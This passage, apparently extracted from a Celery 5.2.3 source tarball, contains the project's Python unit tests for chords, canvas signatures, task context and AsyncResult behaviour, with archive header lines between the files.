Mock(name='t1') t1.app = t1._app = None x = chord([t1], body=t1) assert x.app is current_app def test_chord_size_simple(self): sig = chord(self.add.s()) assert sig.__length_hint__() == 1 def test_chord_size_with_body(self): sig = chord(self.add.s(), self.add.s()) assert sig.__length_hint__() == 1 def test_chord_size_explicit_group_single(self): sig = chord(group(self.add.s())) assert sig.__length_hint__() == 1 def test_chord_size_explicit_group_many(self): sig = chord(group([self.add.s()] * 42)) assert sig.__length_hint__() == 42 def test_chord_size_implicit_group_single(self): sig = chord([self.add.s()]) assert sig.__length_hint__() == 1 def test_chord_size_implicit_group_many(self): sig = chord([self.add.s()] * 42) assert sig.__length_hint__() == 42 def test_chord_size_chain_single(self): sig = chord(chain(self.add.s())) assert sig.__length_hint__() == 1 def test_chord_size_chain_many(self): # Chains get flattened into the encapsulating chord so even though the # chain would only count for 1, the tasks we pulled into the chord's # header and are counted as a bunch of simple signature objects sig = chord(chain([self.add.s()] * 42)) assert sig.__length_hint__() == 42 def test_chord_size_nested_chain_chain_single(self): sig = chord(chain(chain(self.add.s()))) assert sig.__length_hint__() == 1 def test_chord_size_nested_chain_chain_many(self): # The outer chain will be pulled up into the chord but the lower one # remains and will only count as a single final element sig = chord(chain(chain([self.add.s()] * 42))) assert sig.__length_hint__() == 1 def test_chord_size_implicit_chain_single(self): sig = chord([self.add.s()]) assert sig.__length_hint__() == 1 def test_chord_size_implicit_chain_many(self): # This isn't a chain object so the `tasks` attribute can't be lifted # into the chord - this isn't actually valid and would blow up we tried # to run it but it sanity checks our recursion sig = chord([[self.add.s()] * 42]) assert sig.__length_hint__() == 1 def test_chord_size_nested_implicit_chain_chain_single(self): sig = chord([chain(self.add.s())]) assert sig.__length_hint__() == 1 def test_chord_size_nested_implicit_chain_chain_many(self): sig = chord([chain([self.add.s()] * 42)]) assert sig.__length_hint__() == 1 def test_chord_size_nested_chord_body_simple(self): sig = chord(chord(tuple(), self.add.s())) assert sig.__length_hint__() == 1 def test_chord_size_nested_chord_body_implicit_group_single(self): sig = chord(chord(tuple(), [self.add.s()])) assert sig.__length_hint__() == 1 def test_chord_size_nested_chord_body_implicit_group_many(self): sig = chord(chord(tuple(), [self.add.s()] * 42)) assert sig.__length_hint__() == 42 # Nested groups in a chain only affect the chord size if they are the last # element in the chain - in that case each group element is counted def test_chord_size_nested_group_chain_group_head_single(self): x = chord( group( [group(self.add.s()) | self.add.s()] * 42 ), body=self.add.s() ) assert x.__length_hint__() == 42 def test_chord_size_nested_group_chain_group_head_many(self): x = chord( group( [group([self.add.s()] * 4) | self.add.s()] * 2 ), body=self.add.s() ) assert x.__length_hint__() == 2 def test_chord_size_nested_group_chain_group_mid_single(self): x = chord( group( [self.add.s() | group(self.add.s()) | self.add.s()] * 42 ), body=self.add.s() ) assert x.__length_hint__() == 42 def test_chord_size_nested_group_chain_group_mid_many(self): x = chord( group( [self.add.s() | group([self.add.s()] * 4) | self.add.s()] * 2 ), body=self.add.s() ) assert 
x.__length_hint__() == 2 def test_chord_size_nested_group_chain_group_tail_single(self): x = chord( group( [self.add.s() | group(self.add.s())] * 42 ), body=self.add.s() ) assert x.__length_hint__() == 42 def test_chord_size_nested_group_chain_group_tail_many(self): x = chord( group( [self.add.s() | group([self.add.s()] * 4)] * 2 ), body=self.add.s() ) assert x.__length_hint__() == 4 * 2 def test_chord_size_nested_implicit_group_chain_group_tail_single(self): x = chord( [self.add.s() | group(self.add.s())] * 42, body=self.add.s() ) assert x.__length_hint__() == 42 def test_chord_size_nested_implicit_group_chain_group_tail_many(self): x = chord( [self.add.s() | group([self.add.s()] * 4)] * 2, body=self.add.s() ) assert x.__length_hint__() == 4 * 2 def test_chord_size_deserialized_element_single(self): child_sig = self.add.s() deserialized_child_sig = json.loads(json.dumps(child_sig)) # We have to break in to be sure that a child remains as a `dict` so we # can confirm that the length hint will instantiate a `Signature` # object and then descend as expected chord_sig = chord(tuple()) chord_sig.tasks = [deserialized_child_sig] with patch( "celery.canvas.Signature.from_dict", return_value=child_sig ) as mock_from_dict: assert chord_sig. __length_hint__() == 1 mock_from_dict.assert_called_once_with(deserialized_child_sig) def test_chord_size_deserialized_element_many(self): child_sig = self.add.s() deserialized_child_sig = json.loads(json.dumps(child_sig)) # We have to break in to be sure that a child remains as a `dict` so we # can confirm that the length hint will instantiate a `Signature` # object and then descend as expected chord_sig = chord(tuple()) chord_sig.tasks = [deserialized_child_sig] * 42 with patch( "celery.canvas.Signature.from_dict", return_value=child_sig ) as mock_from_dict: assert chord_sig. 
__length_hint__() == 42 mock_from_dict.assert_has_calls([call(deserialized_child_sig)] * 42) def test_set_immutable(self): x = chord([Mock(name='t1'), Mock(name='t2')], app=self.app) x.set_immutable(True) def test_links_to_body(self): x = chord([self.add.s(2, 2), self.add.s(4, 4)], body=self.mul.s(4)) x.link(self.div.s(2)) assert not x.options.get('link') assert x.kwargs['body'].options['link'] x.link_error(self.div.s(2)) assert not x.options.get('link_error') assert x.kwargs['body'].options['link_error'] assert x.tasks assert x.body def test_repr(self): x = chord([self.add.s(2, 2), self.add.s(4, 4)], body=self.mul.s(4)) assert repr(x) x.kwargs['body'] = None assert 'without body' in repr(x) def test_freeze_tasks_body_is_group(self, subtests): # Confirm that `group index` values counting up from 0 are set for # elements of a chord's body when the chord is encapsulated in a group body_elem = self.add.s() chord_body = group([body_elem] * 42) chord_obj = chord(self.add.s(), body=chord_body) top_group = group([chord_obj]) # We expect the body to be the signature we passed in before we freeze with subtests.test(msg="Validate body tasks are retained"): assert all( embedded_body_elem is body_elem for embedded_body_elem in chord_obj.body.tasks ) # We also expect the body to have no initial options - since all of the # embedded body elements are confirmed to be `body_elem` this is valid assert body_elem.options == {} # When we freeze the chord, its body will be cloned and options set top_group.freeze() with subtests.test( msg="Validate body group indices count from 0 after freezing" ): assert all( embedded_body_elem is not body_elem for embedded_body_elem in chord_obj.body.tasks ) assert all( embedded_body_elem.options["group_index"] == i for i, embedded_body_elem in enumerate(chord_obj.body.tasks) ) def test_freeze_tasks_is_not_group(self): x = chord([self.add.s(2, 2)], body=self.add.s(), app=self.app) x.freeze() x.tasks = [self.add.s(2, 2)] x.freeze() def test_chain_always_eager(self): self.app.conf.task_always_eager = True from celery import _state, result fixture_task_join_will_block = _state.task_join_will_block try: _state.task_join_will_block = _state.orig_task_join_will_block result.task_join_will_block = _state.orig_task_join_will_block @self.app.task(shared=False) def finalize(*args): pass @self.app.task(shared=False) def chord_add(): return chord([self.add.s(4, 4)], finalize.s()).apply_async() chord_add.apply_async(throw=True).get() finally: _state.task_join_will_block = fixture_task_join_will_block result.task_join_will_block = fixture_task_join_will_block def test_from_dict(self): header = self.add.s(1, 2) original_chord = chord(header=header) rebuilt_chord = chord.from_dict(dict(original_chord)) assert isinstance(rebuilt_chord, chord) def test_from_dict_with_body(self): header = body = self.add.s(1, 2) original_chord = chord(header=header, body=body) rebuilt_chord = chord.from_dict(dict(original_chord)) assert isinstance(rebuilt_chord, chord) def test_from_dict_deep_deserialize(self, subtests): header = body = self.add.s(1, 2) original_chord = chord(header=header, body=body) serialized_chord = json.loads(json.dumps(original_chord)) deserialized_chord = chord.from_dict(serialized_chord) with subtests.test(msg="Verify chord is deserialized"): assert isinstance(deserialized_chord, chord) with subtests.test(msg="Validate chord header tasks is deserialized"): assert all( isinstance(child_task, Signature) for child_task in deserialized_chord.tasks ) with subtests.test(msg="Verify chord body 
is deserialized"): assert isinstance(deserialized_chord.body, Signature) def test_from_dict_deep_deserialize_group(self, subtests): header = body = group([self.add.s(1, 2)] * 42) original_chord = chord(header=header, body=body) serialized_chord = json.loads(json.dumps(original_chord)) deserialized_chord = chord.from_dict(serialized_chord) with subtests.test(msg="Verify chord is deserialized"): assert isinstance(deserialized_chord, chord) # A header which is a group gets unpacked into the chord's `tasks` with subtests.test( msg="Validate chord header tasks are deserialized and unpacked" ): assert all( isinstance(child_task, Signature) and not isinstance(child_task, group) for child_task in deserialized_chord.tasks ) # A body which is a group remains as it we passed in with subtests.test( msg="Validate chord body is deserialized and not unpacked" ): assert isinstance(deserialized_chord.body, group) assert all( isinstance(body_child_task, Signature) for body_child_task in deserialized_chord.body.tasks ) def test_from_dict_deeper_deserialize_group(self, subtests): inner_group = group([self.add.s(1, 2)] * 42) header = body = group([inner_group] * 42) original_chord = chord(header=header, body=body) serialized_chord = json.loads(json.dumps(original_chord)) deserialized_chord = chord.from_dict(serialized_chord) with subtests.test(msg="Verify chord is deserialized"): assert isinstance(deserialized_chord, chord) # A header which is a group gets unpacked into the chord's `tasks` with subtests.test( msg="Validate chord header tasks are deserialized and unpacked" ): assert all( isinstance(child_task, group) for child_task in deserialized_chord.tasks ) assert all( isinstance(grandchild_task, Signature) for child_task in deserialized_chord.tasks for grandchild_task in child_task.tasks ) # A body which is a group remains as it we passed in with subtests.test( msg="Validate chord body is deserialized and not unpacked" ): assert isinstance(deserialized_chord.body, group) assert all( isinstance(body_child_task, group) for body_child_task in deserialized_chord.body.tasks ) assert all( isinstance(body_grandchild_task, Signature) for body_child_task in deserialized_chord.body.tasks for body_grandchild_task in body_child_task.tasks ) def test_from_dict_deep_deserialize_chain(self, subtests): header = body = chain([self.add.s(1, 2)] * 42) original_chord = chord(header=header, body=body) serialized_chord = json.loads(json.dumps(original_chord)) deserialized_chord = chord.from_dict(serialized_chord) with subtests.test(msg="Verify chord is deserialized"): assert isinstance(deserialized_chord, chord) # A header which is a chain gets unpacked into the chord's `tasks` with subtests.test( msg="Validate chord header tasks are deserialized and unpacked" ): assert all( isinstance(child_task, Signature) and not isinstance(child_task, chain) for child_task in deserialized_chord.tasks ) # A body which is a chain gets mutatated into the hidden `_chain` class with subtests.test( msg="Validate chord body is deserialized and not unpacked" ): assert isinstance(deserialized_chord.body, _chain) class test_maybe_signature(CanvasCase): def test_is_None(self): assert maybe_signature(None, app=self.app) is None def test_is_dict(self): assert isinstance(maybe_signature(dict(self.add.s()), app=self.app), Signature) def test_when_sig(self): s = self.add.s() assert maybe_signature(s, app=self.app) is s ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 
celery-5.2.3/t/unit/tasks/test_chord.py0000664000175000017500000002724300000000000017764 0ustar00asifasif00000000000000from contextlib import contextmanager from unittest.mock import Mock, PropertyMock, patch, sentinel import pytest from celery import canvas, group, result, uuid from celery.exceptions import ChordError, Retry from celery.result import AsyncResult, EagerResult, GroupResult def passthru(x): return x class ChordCase: def setup(self): @self.app.task(shared=False) def add(x, y): return x + y self.add = add class TSR(GroupResult): is_ready = True value = None def ready(self): return self.is_ready def join(self, propagate=True, **kwargs): if propagate: for value in self.value: if isinstance(value, Exception): raise value return self.value join_native = join def _failed_join_report(self): for value in self.value: if isinstance(value, Exception): yield EagerResult('some_id', value, 'FAILURE') class TSRNoReport(TSR): def _failed_join_report(self): return iter([]) @contextmanager def patch_unlock_retry(app): unlock = app.tasks['celery.chord_unlock'] retry = Mock() retry.return_value = Retry() prev, unlock.retry = unlock.retry, retry try: yield unlock, retry finally: unlock.retry = prev class test_unlock_chord_task(ChordCase): def test_unlock_ready(self): class AlwaysReady(TSR): is_ready = True value = [2, 4, 8, 6] with self._chord_context(AlwaysReady) as (cb, retry, _): cb.type.apply_async.assert_called_with( ([2, 4, 8, 6],), {}, task_id=cb.id, ) # didn't retry assert not retry.call_count def test_deps_ready_fails(self): GroupResult = Mock(name='GroupResult') GroupResult.return_value.ready.side_effect = KeyError('foo') unlock_chord = self.app.tasks['celery.chord_unlock'] with pytest.raises(KeyError): unlock_chord('groupid', Mock(), result=[Mock()], GroupResult=GroupResult, result_from_tuple=Mock()) def test_callback_fails(self): class AlwaysReady(TSR): is_ready = True value = [2, 4, 8, 6] def setup(callback): callback.apply_async.side_effect = IOError() with self._chord_context(AlwaysReady, setup) as (cb, retry, fail): fail.assert_called() assert fail.call_args[0][0] == cb.id assert isinstance(fail.call_args[1]['exc'], ChordError) def test_unlock_ready_failed(self): class Failed(TSR): is_ready = True value = [2, KeyError('foo'), 8, 6] with self._chord_context(Failed) as (cb, retry, fail_current): cb.type.apply_async.assert_not_called() # didn't retry assert not retry.call_count fail_current.assert_called() assert fail_current.call_args[0][0] == cb.id assert isinstance(fail_current.call_args[1]['exc'], ChordError) assert 'some_id' in str(fail_current.call_args[1]['exc']) def test_unlock_ready_failed_no_culprit(self): class Failed(TSRNoReport): is_ready = True value = [2, KeyError('foo'), 8, 6] with self._chord_context(Failed) as (cb, retry, fail_current): fail_current.assert_called() assert fail_current.call_args[0][0] == cb.id assert isinstance(fail_current.call_args[1]['exc'], ChordError) @contextmanager def _chord_context(self, ResultCls, setup=None, **kwargs): @self.app.task(shared=False) def callback(*args, **kwargs): pass self.app.finalize() pts, result.GroupResult = result.GroupResult, ResultCls callback.apply_async = Mock() callback_s = callback.s() callback_s.id = 'callback_id' fail_current = self.app.backend.fail_from_current_stack = Mock() try: with patch_unlock_retry(self.app) as (unlock, retry): signature, canvas.maybe_signature = ( canvas.maybe_signature, passthru, ) if setup: setup(callback) try: assert self.app.tasks['celery.chord_unlock'] is unlock try: unlock( 
'group_id', callback_s, result=[ self.app.AsyncResult(r) for r in ['1', 2, 3] ], GroupResult=ResultCls, **kwargs ) except Retry: pass finally: canvas.maybe_signature = signature yield callback_s, retry, fail_current finally: result.GroupResult = pts def test_when_not_ready(self): class NeverReady(TSR): is_ready = False with self._chord_context(NeverReady, interval=10, max_retries=30) \ as (cb, retry, _): cb.type.apply_async.assert_not_called() # did retry retry.assert_called_with(countdown=10, max_retries=30) def test_when_not_ready_with_configured_chord_retry_interval(self): class NeverReady(TSR): is_ready = False self.app.conf.result_chord_retry_interval, prev = 42, self.app.conf.result_chord_retry_interval try: with self._chord_context(NeverReady, max_retries=30) as (cb, retry, _): cb.type.apply_async.assert_not_called() # did retry retry.assert_called_with(countdown=42, max_retries=30) finally: self.app.conf.result_chord_retry_interval = prev def test_is_in_registry(self): assert 'celery.chord_unlock' in self.app.tasks def _test_unlock_join_timeout(self, timeout): class MockJoinResult(TSR): is_ready = True value = [(None,)] join = Mock(return_value=value) join_native = join self.app.conf.result_chord_join_timeout = timeout with self._chord_context(MockJoinResult): MockJoinResult.join.assert_called_with( timeout=timeout, propagate=True, ) def test_unlock_join_timeout_default(self): self._test_unlock_join_timeout( timeout=self.app.conf.result_chord_join_timeout, ) def test_unlock_join_timeout_custom(self): self._test_unlock_join_timeout(timeout=5.0) def test_unlock_with_chord_params(self): @self.app.task(shared=False) def mul(x, y): return x * y from celery import chord ch = chord(group(mul.s(1, 1), mul.s(2, 2)), mul.s(), interval=10) with patch.object(ch, 'run') as run: ch.apply_async() run.assert_called_once_with(group(mul.s(1, 1), mul.s(2, 2)), mul.s(), (), task_id=None, interval=10) def test_unlock_with_chord_params_and_task_id(self): @self.app.task(shared=False) def mul(x, y): return x * y from celery import chord ch = chord(group(mul.s(1, 1), mul.s(2, 2)), mul.s(), interval=10) with patch.object(ch, 'run') as run: ch.apply_async(task_id=sentinel.task_id) run.assert_called_once_with( group(mul.s(1, 1), mul.s(2, 2)), mul.s(), (), task_id=sentinel.task_id, interval=10, ) class test_chord(ChordCase): def test_eager(self): from celery import chord @self.app.task(shared=False) def addX(x, y): return x + y @self.app.task(shared=False) def sumX(n): return sum(n) self.app.conf.task_always_eager = True x = chord(addX.s(i, i) for i in range(10)) body = sumX.s() result = x(body) assert result.get() == sum(i + i for i in range(10)) def test_apply(self): self.app.conf.task_always_eager = False from celery import chord m = Mock() m.app.conf.task_always_eager = False m.AsyncResult = AsyncResult prev, chord.run = chord.run, m try: x = chord(self.add.s(i, i) for i in range(10)) body = self.add.s(2) result = x(body) assert result.id # does not modify original signature with pytest.raises(KeyError): body.options['task_id'] chord.run.assert_called() finally: chord.run = prev def test_init(self): from celery import chord from celery.utils.serialization import pickle @self.app.task(shared=False) def addX(x, y): return x + y @self.app.task(shared=False) def sumX(n): return sum(n) x = chord(addX.s(i, i) for i in range(10)) # kwargs used to nest and recurse in serialization/deserialization # (#6810) assert x.kwargs['kwargs'] == {} assert pickle.loads(pickle.dumps(x)).kwargs == x.kwargs class 
test_add_to_chord: def setup(self): @self.app.task(shared=False) def add(x, y): return x + y self.add = add @self.app.task(shared=False, bind=True) def adds(self, sig, lazy=False): return self.add_to_chord(sig, lazy) self.adds = adds @patch('celery.Celery.backend', new=PropertyMock(name='backend')) def test_add_to_chord(self): sig = self.add.s(2, 2) sig.delay = Mock(name='sig.delay') self.adds.request.group = uuid() self.adds.request.id = uuid() with pytest.raises(ValueError): # task not part of chord self.adds.run(sig) self.adds.request.chord = self.add.s() res1 = self.adds.run(sig, True) assert res1 == sig assert sig.options['task_id'] assert sig.options['group_id'] == self.adds.request.group assert sig.options['chord'] == self.adds.request.chord sig.delay.assert_not_called() self.app.backend.add_to_chord.assert_called_with( self.adds.request.group, sig.freeze(), ) self.app.backend.reset_mock() sig2 = self.add.s(4, 4) sig2.delay = Mock(name='sig2.delay') res2 = self.adds.run(sig2) assert res2 == sig2.delay.return_value assert sig2.options['task_id'] assert sig2.options['group_id'] == self.adds.request.group assert sig2.options['chord'] == self.adds.request.chord sig2.delay.assert_called_with() self.app.backend.add_to_chord.assert_called_with( self.adds.request.group, sig2.freeze(), ) class test_Chord_task(ChordCase): @patch('celery.Celery.backend', new=PropertyMock(name='backend')) def test_run(self): self.app.backend.cleanup = Mock() self.app.backend.cleanup.__name__ = 'cleanup' Chord = self.app.tasks['celery.chord'] body = self.add.signature() Chord(group(self.add.signature((i, i)) for i in range(5)), body) Chord([self.add.signature((j, j)) for j in range(5)], body) assert self.app.backend.apply_chord.call_count == 2 @patch('celery.Celery.backend', new=PropertyMock(name='backend')) def test_run__chord_size_set(self): Chord = self.app.tasks['celery.chord'] body = self.add.signature() group_size = 4 group1 = group(self.add.signature((i, i)) for i in range(group_size)) result = Chord(group1, body) self.app.backend.set_chord_size.assert_called_once_with(result.parent.id, group_size) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/tasks/test_context.py0000664000175000017500000000443600000000000020350 0ustar00asifasif00000000000000from celery.app.task import Context # Retrieve the values of all context attributes as a # dictionary in an implementation-agnostic manner. def get_context_as_dict(ctx, getter=getattr): defaults = {} for attr_name in dir(ctx): if attr_name.startswith('_'): continue # Ignore pseudo-private attributes attr = getter(ctx, attr_name) if callable(attr): continue # Ignore methods and other non-trivial types defaults[attr_name] = attr return defaults default_context = get_context_as_dict(Context()) class test_Context: def test_default_context(self): # A bit of a tautological test, since it uses the same # initializer as the default_context constructor. 
defaults = dict(default_context, children=[]) assert get_context_as_dict(Context()) == defaults def test_updated_context(self): expected = dict(default_context) changes = {'id': 'unique id', 'args': ['some', 1], 'wibble': 'wobble'} ctx = Context() expected.update(changes) ctx.update(changes) assert get_context_as_dict(ctx) == expected assert get_context_as_dict(Context()) == default_context def test_modified_context(self): expected = dict(default_context) ctx = Context() expected['id'] = 'unique id' expected['args'] = ['some', 1] ctx.id = 'unique id' ctx.args = ['some', 1] assert get_context_as_dict(ctx) == expected assert get_context_as_dict(Context()) == default_context def test_cleared_context(self): changes = {'id': 'unique id', 'args': ['some', 1], 'wibble': 'wobble'} ctx = Context() ctx.update(changes) ctx.clear() defaults = dict(default_context, children=[]) assert get_context_as_dict(ctx) == defaults assert get_context_as_dict(Context()) == defaults def test_context_get(self): expected = dict(default_context) changes = {'id': 'unique id', 'args': ['some', 1], 'wibble': 'wobble'} ctx = Context() expected.update(changes) ctx.update(changes) ctx_dict = get_context_as_dict(ctx, getter=Context.get) assert ctx_dict == expected assert get_context_as_dict(Context()) == default_context ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/tasks/test_result.py0000664000175000017500000010427100000000000020200 0ustar00asifasif00000000000000import copy import datetime import traceback from contextlib import contextmanager from unittest.mock import Mock, call, patch import pytest from celery import states, uuid from celery.app.task import Context from celery.backends.base import SyncBackendMixin from celery.exceptions import (ImproperlyConfigured, IncompleteStream, TimeoutError) from celery.result import (AsyncResult, EagerResult, GroupResult, ResultSet, assert_will_not_block, result_from_tuple) from celery.utils.serialization import pickle PYTRACEBACK = """\ Traceback (most recent call last): File "foo.py", line 2, in foofunc don't matter File "bar.py", line 3, in barfunc don't matter Doesn't matter: really!\ """ def mock_task(name, state, result, traceback=None): return { 'id': uuid(), 'name': name, 'state': state, 'result': result, 'traceback': traceback, } def save_result(app, task): traceback = task.get('traceback') or 'Some traceback' if task['state'] == states.SUCCESS: app.backend.mark_as_done(task['id'], task['result']) elif task['state'] == states.RETRY: app.backend.mark_as_retry( task['id'], task['result'], traceback=traceback, ) else: app.backend.mark_as_failure( task['id'], task['result'], traceback=traceback, ) def make_mock_group(app, size=10): tasks = [mock_task('ts%d' % i, states.SUCCESS, i) for i in range(size)] [save_result(app, task) for task in tasks] return [app.AsyncResult(task['id']) for task in tasks] class _MockBackend: def add_pending_result(self, *args, **kwargs): return True def wait_for_pending(self, *args, **kwargs): return True def remove_pending_result(self, *args, **kwargs): return True class test_AsyncResult: def setup(self): self.app.conf.result_cache_max = 100 self.app.conf.result_serializer = 'pickle' self.app.conf.result_extended = True self.task1 = mock_task('task1', states.SUCCESS, 'the') self.task2 = mock_task('task2', states.SUCCESS, 'quick') self.task3 = mock_task('task3', states.FAILURE, KeyError('brown')) self.task4 = mock_task('task3', states.RETRY, KeyError('red')) self.task5 
= mock_task( 'task3', states.FAILURE, KeyError('blue'), PYTRACEBACK, ) self.task6 = mock_task('task6', states.SUCCESS, None) for task in (self.task1, self.task2, self.task3, self.task4, self.task5, self.task6): save_result(self.app, task) @self.app.task(shared=False) def mytask(): pass self.mytask = mytask def test_forget(self): first = Mock() second = self.app.AsyncResult(self.task1['id'], parent=first) third = self.app.AsyncResult(self.task2['id'], parent=second) last = self.app.AsyncResult(self.task3['id'], parent=third) last.forget() first.forget.assert_called_once() assert last.result is None assert second.result is None def test_ignored_getter(self): result = self.app.AsyncResult(uuid()) assert result.ignored is False result.__delattr__('_ignored') assert result.ignored is False @patch('celery.result.task_join_will_block') def test_assert_will_not_block(self, task_join_will_block): task_join_will_block.return_value = True with pytest.raises(RuntimeError): assert_will_not_block() task_join_will_block.return_value = False assert_will_not_block() @patch('celery.result.task_join_will_block') def test_get_sync_subtask_option(self, task_join_will_block): task_join_will_block.return_value = True tid = uuid() backend = _MockBackend() res_subtask_async = AsyncResult(tid, backend=backend) with pytest.raises(RuntimeError): res_subtask_async.get() res_subtask_async.get(disable_sync_subtasks=False) def test_without_id(self): with pytest.raises(ValueError): AsyncResult(None, app=self.app) def test_compat_properties(self): x = self.app.AsyncResult('1') assert x.task_id == x.id x.task_id = '2' assert x.id == '2' @pytest.mark.usefixtures('depends_on_current_app') def test_reduce_direct(self): x = AsyncResult('1', app=self.app) fun, args = x.__reduce__() assert fun(*args) == x def test_children(self): x = self.app.AsyncResult('1') children = [EagerResult(str(i), i, states.SUCCESS) for i in range(3)] x._cache = {'children': children, 'status': states.SUCCESS} x.backend = Mock() assert x.children assert len(x.children) == 3 def test_propagates_for_parent(self): x = self.app.AsyncResult(uuid()) x.backend = Mock(name='backend') x.backend.get_task_meta.return_value = {} x.backend.wait_for_pending.return_value = 84 x.parent = EagerResult(uuid(), KeyError('foo'), states.FAILURE) with pytest.raises(KeyError): x.get(propagate=True) x.backend.wait_for_pending.assert_not_called() x.parent = EagerResult(uuid(), 42, states.SUCCESS) assert x.get(propagate=True) == 84 x.backend.wait_for_pending.assert_called() def test_get_children(self): tid = uuid() x = self.app.AsyncResult(tid) child = [self.app.AsyncResult(uuid()).as_tuple() for i in range(10)] x._cache = {'children': child} assert x.children assert len(x.children) == 10 x._cache = {'status': states.SUCCESS} x.backend._cache[tid] = {'result': None} assert x.children is None def test_build_graph_get_leaf_collect(self): x = self.app.AsyncResult('1') x.backend._cache['1'] = {'status': states.SUCCESS, 'result': None} c = [EagerResult(str(i), i, states.SUCCESS) for i in range(3)] x.iterdeps = Mock() x.iterdeps.return_value = ( (None, x), (x, c[0]), (c[0], c[1]), (c[1], c[2]) ) x.backend.READY_STATES = states.READY_STATES assert x.graph assert x.get_leaf() == 2 it = x.collect() assert list(it) == [ (x, None), (c[0], 0), (c[1], 1), (c[2], 2), ] def test_iterdeps(self): x = self.app.AsyncResult('1') c = [EagerResult(str(i), i, states.SUCCESS) for i in range(3)] x._cache = {'status': states.SUCCESS, 'result': None, 'children': c} for child in c: child.backend = Mock() 
child.backend.get_children.return_value = [] it = x.iterdeps() assert list(it) == [ (None, x), (x, c[0]), (x, c[1]), (x, c[2]), ] x._cache = None x.ready = Mock() x.ready.return_value = False with pytest.raises(IncompleteStream): list(x.iterdeps()) list(x.iterdeps(intermediate=True)) def test_eq_not_implemented(self): assert self.app.AsyncResult('1') != object() @pytest.mark.usefixtures('depends_on_current_app') def test_reduce(self): a1 = self.app.AsyncResult('uuid') restored = pickle.loads(pickle.dumps(a1)) assert restored.id == 'uuid' a2 = self.app.AsyncResult('uuid') assert pickle.loads(pickle.dumps(a2)).id == 'uuid' def test_maybe_set_cache_empty(self): self.app.AsyncResult('uuid')._maybe_set_cache(None) def test_set_cache__children(self): r1 = self.app.AsyncResult('id1') r2 = self.app.AsyncResult('id2') r1._set_cache({'children': [r2.as_tuple()]}) assert r2 in r1.children def test_successful(self): ok_res = self.app.AsyncResult(self.task1['id']) nok_res = self.app.AsyncResult(self.task3['id']) nok_res2 = self.app.AsyncResult(self.task4['id']) assert ok_res.successful() assert not nok_res.successful() assert not nok_res2.successful() pending_res = self.app.AsyncResult(uuid()) assert not pending_res.successful() def test_raising(self): notb = self.app.AsyncResult(self.task3['id']) withtb = self.app.AsyncResult(self.task5['id']) with pytest.raises(KeyError): notb.get() with pytest.raises(KeyError) as excinfo: withtb.get() tb = [t.strip() for t in traceback.format_tb(excinfo.tb)] assert 'File "foo.py", line 2, in foofunc' not in tb assert 'File "bar.py", line 3, in barfunc' not in tb assert excinfo.value.args[0] == 'blue' assert excinfo.typename == 'KeyError' def test_raising_remote_tracebacks(self): pytest.importorskip('tblib') withtb = self.app.AsyncResult(self.task5['id']) self.app.conf.task_remote_tracebacks = True with pytest.raises(KeyError) as excinfo: withtb.get() tb = [t.strip() for t in traceback.format_tb(excinfo.tb)] assert 'File "foo.py", line 2, in foofunc' in tb assert 'File "bar.py", line 3, in barfunc' in tb assert excinfo.value.args[0] == 'blue' assert excinfo.typename == 'KeyError' def test_str(self): ok_res = self.app.AsyncResult(self.task1['id']) ok2_res = self.app.AsyncResult(self.task2['id']) nok_res = self.app.AsyncResult(self.task3['id']) assert str(ok_res) == self.task1['id'] assert str(ok2_res) == self.task2['id'] assert str(nok_res) == self.task3['id'] pending_id = uuid() pending_res = self.app.AsyncResult(pending_id) assert str(pending_res) == pending_id def test_repr(self): ok_res = self.app.AsyncResult(self.task1['id']) ok2_res = self.app.AsyncResult(self.task2['id']) nok_res = self.app.AsyncResult(self.task3['id']) assert repr(ok_res) == f"" assert repr(ok2_res) == f"" assert repr(nok_res) == f"" pending_id = uuid() pending_res = self.app.AsyncResult(pending_id) assert repr(pending_res) == f'' def test_hash(self): assert (hash(self.app.AsyncResult('x0w991')) == hash(self.app.AsyncResult('x0w991'))) assert (hash(self.app.AsyncResult('x0w991')) != hash(self.app.AsyncResult('x1w991'))) def test_get_traceback(self): ok_res = self.app.AsyncResult(self.task1['id']) nok_res = self.app.AsyncResult(self.task3['id']) nok_res2 = self.app.AsyncResult(self.task4['id']) assert not ok_res.traceback assert nok_res.traceback assert nok_res2.traceback pending_res = self.app.AsyncResult(uuid()) assert not pending_res.traceback def test_get__backend_gives_None(self): res = self.app.AsyncResult(self.task1['id']) res.backend.wait_for = Mock(name='wait_for') 
res.backend.wait_for.return_value = None assert res.get() is None def test_get(self): ok_res = self.app.AsyncResult(self.task1['id']) ok2_res = self.app.AsyncResult(self.task2['id']) nok_res = self.app.AsyncResult(self.task3['id']) nok2_res = self.app.AsyncResult(self.task4['id']) none_res = self.app.AsyncResult(self.task6['id']) callback = Mock(name='callback') assert ok_res.get(callback=callback) == 'the' callback.assert_called_with(ok_res.id, 'the') assert ok2_res.get() == 'quick' with pytest.raises(KeyError): nok_res.get() assert nok_res.get(propagate=False) assert isinstance(nok2_res.result, KeyError) assert ok_res.info == 'the' assert none_res.get() is None assert none_res.state == states.SUCCESS def test_get_when_ignored(self): result = self.app.AsyncResult(uuid()) result.ignored = True # Does not block assert result.get() is None def test_eq_ne(self): r1 = self.app.AsyncResult(self.task1['id']) r2 = self.app.AsyncResult(self.task1['id']) r3 = self.app.AsyncResult(self.task2['id']) assert r1 == r2 assert r1 != r3 assert r1 == r2.id assert r1 != r3.id @pytest.mark.usefixtures('depends_on_current_app') def test_reduce_restore(self): r1 = self.app.AsyncResult(self.task1['id']) fun, args = r1.__reduce__() assert fun(*args) == r1 def test_get_timeout(self): res = self.app.AsyncResult(self.task4['id']) # has RETRY state with pytest.raises(TimeoutError): res.get(timeout=0.001) pending_res = self.app.AsyncResult(uuid()) with patch('celery.result.time') as _time: with pytest.raises(TimeoutError): pending_res.get(timeout=0.001, interval=0.001) _time.sleep.assert_called_with(0.001) def test_get_timeout_longer(self): res = self.app.AsyncResult(self.task4['id']) # has RETRY state with patch('celery.result.time') as _time: with pytest.raises(TimeoutError): res.get(timeout=1, interval=1) _time.sleep.assert_called_with(1) def test_ready(self): oks = (self.app.AsyncResult(self.task1['id']), self.app.AsyncResult(self.task2['id']), self.app.AsyncResult(self.task3['id'])) assert all(result.ready() for result in oks) assert not self.app.AsyncResult(self.task4['id']).ready() assert not self.app.AsyncResult(uuid()).ready() def test_del(self): with patch('celery.result.AsyncResult.backend') as 